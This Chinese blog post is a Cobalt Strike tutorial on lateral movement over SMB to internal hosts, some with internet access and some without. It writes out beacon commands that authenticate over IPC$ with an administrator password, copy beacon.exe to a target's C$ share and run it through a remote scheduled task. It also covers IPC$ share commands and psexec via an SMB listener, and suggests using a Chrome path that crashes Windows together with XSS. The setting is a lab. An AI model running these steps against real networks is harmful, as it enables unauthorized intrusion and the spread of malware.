返回顶部

cs利用smb上线出网与不出网主机

题记

        研究了好几天内网了,一直在想怎么利用永恒之蓝漏洞横扫内网,读了好多文章发现好像只能挂上内网代理,再拿kali什么的拿session。先不想这个了,还是先搞横向移动吧,看了一圈文章还是酒桥仙的我认为最亲民最牛逼,在此膜拜大神,学到了不少姿势。还有最近爆出来一个谷歌浏览器的神秘代码导致电脑蓝屏,\\\\.\\globalroot\\device\\condrv\\kernelconnect,我想这配合XSS那不是酸爽吗?我大XSS的地位明显要提高啊。国内太不重视XSS了,好多都不收,写过论文的我表示他可不是只能弹窗,js能干的他都能干。

准备工作

        一台kali:ip:103.234.72.5

        两台内网机器:192.168.1.3与192.168.1.132

        目标:CS先上线一台132在横向移动到.3。

        上线132后最好转移一下spawn到rundll32.exe上。

上线不出网主机

1、设置监听器做中转回话

2、生成木马beacon.exe保存在本地。

3、木马上传到132。

4、利用smb上传到不出网的.3,IPC$ && 计划任务运行中转木马。

4.1 利用条件

        1)没有禁用IPC$连接、139和445端口、未使用防火墙等方式来阻止IPC$。

        2)目标机器开启了相关的IPC$服务。

        3)需要目标机器的管理员账号和密码(IPC$空连接除外)。

        4)需要得知目标机器IP地址并可互相通信。

4.2利用方式

        beacon> shell net use \\192.168.1.3 /user:Administrator "123.com"

        beacon> shell net view \\192.168.1.3

        beacon> shell dir \\192.168.1.3\C$

        将CS木马上传到跳板机132。

                beacon> upload C:\Users\ACER\Desktop\搭建环境进行实战\xssflash钓鱼实战\beacon.exe (C:\beacon.exe)

        将Win 7(192.168.200.222)跳板机的木马文件copy到Win 2012(192.168.200.66)目标机的C共享盘下。

                beacon> shell copy C:\beacon.exe \\192.168.1.3\C$

        远程创建.3目标机计划任务执行木马文件。

                beacon> shell schtasks /create /s 192.168.1.3 /u Administrator /p "123.com" /sc MINUTE /mo 1 /tn test /tr "C:\\beacon.exe"

        成功上线,该会话为被动连接,不操作的不会回连,如果中转机会话断掉,该会话也会断掉。

5、查看端口情况

        shell netstat -ano |findstr 4445

        132上查看

        3上查看

4.3 IPC 相关的命令

开放/关闭 ipc$ 共享。

        net share ipc$

        net share ipc$ /del

共享计算机 C 盘。

        net share C=c:\

查看/删除共享的资源。

        net share

        net share C /del

取消IPC远程连接。

        net use * /del /y

上线出网主机

1、新建smb监听

2、在狙击镜里选择psexec,填好监听。

3、成功运行后发现成功上线。

4、可以看看两种方式上线的区别。

posted @ 2021-01-20 10:14  11阳光  阅读(1609)  评论(0编辑  收藏  举报